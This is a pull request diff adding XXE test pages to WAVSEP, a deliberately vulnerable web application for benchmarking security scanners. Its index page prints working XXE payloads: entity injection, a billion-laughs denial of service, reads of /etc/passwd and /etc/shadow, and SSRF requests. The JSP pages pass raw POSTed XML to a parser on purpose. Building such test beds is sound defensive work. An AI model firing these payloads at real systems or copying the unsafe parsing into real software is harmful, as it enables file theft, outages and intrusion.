Merge pull request #14 from psiinon/rwav/xxe

Add rwavsep XXE tests

Author: psiinon

.gitignore

@@ -2,3 +2,4 @@
 /.settings/
 /.classpath
 /.project
+/bin/

CHANGELOG.md

@@ -4,11 +4,14 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 
 ## 2025-09-02
+### Added
+- Imported XXE from [Reinforced Wavsep](https://github.com/luigiurbano/Reinforced-Wavsep) at commit [962d566](https://github.com/luigiurbano/Reinforced-Wavsep/commit/962d566ebe51a3f64f772b6c1856d99f1150ba4a). Updated them to use the same endpoint to handle the POST requests instead of using a common one.
 
 ### Changed
 - Unvalidated-Redirect/Redirect-FalsePositives-GET/Case09... now uses the default host from the first configured engine (identified via JMX) instead of the requested host name (which could have been from a manipulated Host header).
 
 ## 2025-08-30
+### Added
 - Imported OS Command Injection tests from [Reinforced Wavsep](https://github.com/luigiurbano/Reinforced-Wavsep) at commit [962d566](https://github.com/luigiurbano/Reinforced-Wavsep/commit/962d566ebe51a3f64f772b6c1856d99f1150ba4a).
 
 ## 2025-08-28

README.md

@@ -8,6 +8,13 @@ WAVSEP is a vulnerable web application designed to help assessing the features,
 
 This evaluation platform contains a collection of unique vulnerable web pages that can be used to test the various properties of web application scanners.
 
+### Reinforced Wavsep
+
+This fork also includes the following tests added to [Reinforced Wavsep](https://github.com/luigiurbano/Reinforced-Wavsep)
+
+* OS Command Injection
+* XML External Entity 
+
 ## Building
 
 WAVSEP can be run in one standalone Docker container.

WebContent/active/XXE/XXE-POST-500Error/Case01-XXE-Injection-Entity-Example-WithErrors.jsp

@@ -0,0 +1,51 @@
+<%@page import="com.sectooladdict.utils.XxeUtils"%>
+<%
+if (request.getMethod().equals("POST")) {
+	try {
+		out.print(XxeUtils.process(request.getInputStream()));
+	} catch (Exception e) {
+		response.sendError(500, e.getMessage());
+	}
+	return;
+}
+%>
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+	pageEncoding="ISO-8859-1"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Case 1 - XXE Injection into intercepted request. Goal: perform simple XXE injection.</title>
+    <script>
+	    function sendXml()
+	    {
+		       var xhr = new XMLHttpRequest();
+		       xhr.open("POST", "<%= request.getRequestURL() %>");
+		       var xmlDoc;
+		       
+		       xhr.onreadystatechange = function() 
+		       {
+		           if (xhr.readyState == 4 && xhr.status == 200)
+		           {
+			           document.getElementById("result").innerHTML=xhr.responseText
+		           }
+		       };
+		       
+		        xhr.setRequestHeader('Content-Type', 'text/xml');
+				var xml="<?xml version=\"1.0\" encoding=\"UTF-8\"?><employees>\n<employee id=\"1\">\n<firstName>Lokesh</firstName>\n<lastName>Gupta</lastName>\n<location>India</location>\n</employee>\n<employee id=\"2\">\n<firstName>Alex</firstName>\n<lastName>Gussin</lastName>\n<location>Russia</location>\n</employee>\n<employee id=\"3\">\n<firstName>David</firstName>\n<lastName>Feezor</lastName>\n<location>USA</location>\n</employee>\n</employees>";
+				xhr.send(xml);
+	      }
+    </script>
+</head>
+
+<body>
+<h4></h4>
+	<form>
+		<B>Employees:</B><br><br>
+		 <script>sendXml();</script>
+	</form>
+	<div id="result"></div>
+	
+	<br><br>
+</body>
+</html>

WebContent/active/XXE/XXE-POST-500Error/Case02-XXE-Injection-Denial-of-Service-WithErrors.jsp

@@ -0,0 +1,51 @@
+<%@page import="com.sectooladdict.utils.XxeUtils"%>
+<%
+if (request.getMethod().equals("POST")) {
+	try {
+		out.print(XxeUtils.process(request.getInputStream()));
+	} catch (Exception e) {
+		response.sendError(500, e.getMessage());
+	}
+	return;
+}
+%>
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+	pageEncoding="ISO-8859-1"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Case 2 - XXE Injection into intercepted request. Goal: perform XXE injection to execute a DoS.</title>
+    <script>
+	    function sendXml()
+	    {
+		       var xhr = new XMLHttpRequest();
+		       xhr.open("POST", "<%= request.getRequestURL() %>");
+		       var xmlDoc;
+		       
+		       xhr.onreadystatechange = function() 
+		       {
+		           if (xhr.readyState == 4 && xhr.status == 200)
+		           {
+			           document.getElementById("result").innerHTML=xhr.responseText
+		           }
+		       };
+		       
+		        xhr.setRequestHeader('Content-Type', 'text/xml');
+				var xml="<?xml version=\"1.0\" encoding=\"UTF-8\"?><employees>\n<employee id=\"1\">\n<firstName>Lokesh</firstName>\n<lastName>Gupta</lastName>\n<location>India</location>\n</employee>\n<employee id=\"2\">\n<firstName>Alex</firstName>\n<lastName>Gussin</lastName>\n<location>Russia</location>\n</employee>\n<employee id=\"3\">\n<firstName>David</firstName>\n<lastName>Feezor</lastName>\n<location>USA</location>\n</employee>\n</employees>";
+				xhr.send(xml);
+	      }
+    </script>
+</head>
+
+<body>
+<h4></h4>
+	<form>
+		<B>Employees:</B><br><br>
+		<script>sendXml();</script>
+	</form>
+	<div id="result"></div>
+	
+	<br><br>
+</body>
+</html>

WebContent/active/XXE/XXE-POST-500Error/Case03-XXE-Injection-File-Disclosure-WithErrors.jsp

@@ -0,0 +1,51 @@
+<%@page import="com.sectooladdict.utils.XxeUtils"%>
+<%
+if (request.getMethod().equals("POST")) {
+	try {
+		out.print(XxeUtils.process(request.getInputStream()));
+	} catch (Exception e) {
+		response.sendError(500, e.getMessage());
+	}
+	return;
+}
+%>
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+	pageEncoding="ISO-8859-1"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Case 3 - XXE Injection into intercepted request. Goal: perform XXE injection to retrieve files.</title>
+    <script>
+	    function sendXml()
+	    {
+		       var xhr = new XMLHttpRequest();
+		       xhr.open("POST", "<%= request.getRequestURL() %>");
+		       var xmlDoc;
+		       
+		       xhr.onreadystatechange = function() 
+		       {
+		           if (xhr.readyState == 4 && xhr.status == 200)
+		           {
+			           document.getElementById("result").innerHTML=xhr.responseText
+		           }
+		       };
+		       
+		        xhr.setRequestHeader('Content-Type', 'text/xml');
+				var xml="<?xml version=\"1.0\" encoding=\"UTF-8\"?><employees>\n<employee id=\"1\">\n<firstName>Lokesh</firstName>\n<lastName>Gupta</lastName>\n<location>India</location>\n</employee>\n<employee id=\"2\">\n<firstName>Alex</firstName>\n<lastName>Gussin</lastName>\n<location>Russia</location>\n</employee>\n<employee id=\"3\">\n<firstName>David</firstName>\n<lastName>Feezor</lastName>\n<location>USA</location>\n</employee>\n</employees>";
+				xhr.send(xml);
+	      }
+    </script>
+</head>
+
+<body>
+<h4></h4>
+	<form>
+		<B>Employees:</B><br><br>
+		<script>sendXml();</script>
+	</form>
+	<div id="result"></div>
+	
+	<br><br>
+</body>
+</html>

WebContent/active/XXE/XXE-POST-500Error/Case04-XXE-Injection-SSRF-WithErrors.jsp

@@ -0,0 +1,51 @@
+<%@page import="com.sectooladdict.utils.XxeUtils"%>
+<%
+if (request.getMethod().equals("POST")) {
+	try {
+		out.print(XxeUtils.process(request.getInputStream()));
+	} catch (Exception e) {
+		response.sendError(500, e.getMessage());
+	}
+	return;
+}
+%>
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+	pageEncoding="ISO-8859-1"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Case 4 - XXE Injection into intercepted request. Goal: perform SSRF attacks.</title>
+    <script>
+	    function sendXml()
+	    {
+		       var xhr = new XMLHttpRequest();
+		       xhr.open("POST", "<%= request.getRequestURL() %>");
+		       var xmlDoc;
+		       
+		       xhr.onreadystatechange = function() 
+		       {
+		           if (xhr.readyState == 4 && xhr.status == 200)
+		           {
+			           document.getElementById("result").innerHTML=xhr.responseText
+		           }
+		       };
+		       
+		        xhr.setRequestHeader('Content-Type', 'text/xml');
+				var xml="<?xml version=\"1.0\" encoding=\"UTF-8\"?><employees>\n<employee id=\"1\">\n<firstName>Lokesh</firstName>\n<lastName>Gupta</lastName>\n<location>India</location>\n</employee>\n<employee id=\"2\">\n<firstName>Alex</firstName>\n<lastName>Gussin</lastName>\n<location>Russia</location>\n</employee>\n<employee id=\"3\">\n<firstName>David</firstName>\n<lastName>Feezor</lastName>\n<location>USA</location>\n</employee>\n</employees>";
+				xhr.send(xml);
+	      }
+    </script>
+</head>
+
+<body>
+<h4></h4>
+	<form>
+		<B>Employees:</B><br><br>
+		<script>sendXml();</script>
+	</form>
+	<div id="result"></div>
+	
+	<br><br>
+</body>
+</html>

WebContent/active/XXE/XXE-POST-500Error/index.jsp

@@ -0,0 +1,114 @@
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+    pageEncoding="ISO-8859-1"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Evaluation of XXE Injection Detection Accuracy - HTTP POST Intercepted Request Vector Method Responses</title>
+</head>
+<body>
+
+<center><font size="5">Injection Test Cases - HTTP POST Intercepted Request Method Responses:</font></center><br><br>
+<B><a href="Case01-XXE-Injection-Entity-Example-WithErrors.jsp">Case01-XXE-Injection-Entity-Example-WithErrors.jsp</a></B><br>
+  XXE Injection into intercepted request.<br>
+  Goal: perform simple xxe injection.<br>
+  <U>Barriers:</U><br>
+   None <br>
+   <U>Example:</U> <B><xmp><!--?xml version="1.0" ?-->
+<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
+ <userInfo>
+  <firstName>John</firstName>
+  <lastName>&example;</lastName>
+ </userInfo></xmp></B>
+  <U>Exploit:</U> <B><xmp><?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE replace [<!ENTITY example "That'sNotMyLastName!XXE-Work!"> ]>
+ <employees>
+ <employee id="1">
+  <firstName>John</firstName>
+  <lastName>&example;</lastName>
+</employee>
+</employees></xmp></B><br>
+  
+<B><a href="Case02-XXE-Injection-Denial-of-Service-WithErrors.jsp">Case02-XXE-Injection-Denial-of-Service-WithErrors.jsp</a></B><br>
+   XXE Injection into intercepted request.<br>
+  Goal: perform XXE injection to execute a DoS.<br>
+  <U>Barriers:</U><br>
+   None <br>
+  <U>Example:</U><B><xmp><!--?xml version="1.0" ?-->
+<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
+<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;
+<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
+<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
+<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
+<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
+<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
+<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
+<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
+<tag>&lol9;</tag></xmp></B>
+  <U>Exploit:</U> <B><xmp><?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE lolz [
+ <!ENTITY lol "lol">
+ <!ENTITY lola "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
+ <!ENTITY lolb "&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;">
+ <!ENTITY lolc "&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;">
+ <!ENTITY lole "&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;">
+ <!ENTITY lold "&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;">
+ <!ENTITY lolf "&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;">
+ <!ENTITY lolg "&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;">
+ <!ENTITY lolh "&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;">
+ <!ENTITY loli "&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;">
+]>
+<employees>
+    <employee id="1">
+        <firstName>John</firstName>
+        <lastName>Doe</lastName>
+        <location>&loli;</location>
+    </employee>
+</employees></xmp></B><br>
+  
+  <B><a href="Case03-XXE-Injection-File-Disclosure-WithErrors.jsp">Case03-XXE-Injection-File-Disclosure-WithErrors.jsp</a></B><br>
+  XXE Injection into intercepted request.<br>
+  Goal: perform XXE injection to retrieve files.<br>
+  <U>Barriers:</U><br>
+   None <br>
+   <U>Example:</U><br>
+   <B><xmp><!--?xml version="1.0" ?-->
+<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
+<userInfo>
+ <firstName>John</firstName>
+ <lastName>&ent;</lastName>
+</userInfo></xmp></B>
+  <U>Exploit:</U><br>
+    <B><xmp><?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE employees [  <!ENTITY file SYSTEM "file:///etc/passwd"> ]>
+<employees>
+    <employee id="1">
+        <firstName>John</firstName>
+        <lastName>Doe</lastName>
+        <location>&file;</location>
+    </employee>
+</employees></xmp></B><br>
+    
+    <B><a href="Case04-XXE-Injection-SSRF-WithErrors.jsp">Case04-XXE-Injection-SSRF-WithErrors.jsp</a></B><br>
+   XXE Injection into intercepted request.<br>
+   Goal: perform SSRF attacks.<br>
+  <U>Barriers:</U><br>
+   None <br>
+   <U>Example:</U>
+   <B><xmp><?xml version="1.0"?>
+<!DOCTYPE foo [  
+<!ELEMENT foo (#ANY)>
+<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo></xmp></B>
+  <U>Exploit:</U><B>
+  <xmp><?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE employees [  <!ENTITY file SYSTEM "http://dummy.restapiexample.com/api/v1/employees"> ]>
+<employees>
+    <employee id="1">
+        <firstName>John</firstName>
+        <lastName>Doe</lastName>
+        <location>&file;</location>
+    </employee>
+</employees></xmp></B><br>
+</body>
+</html>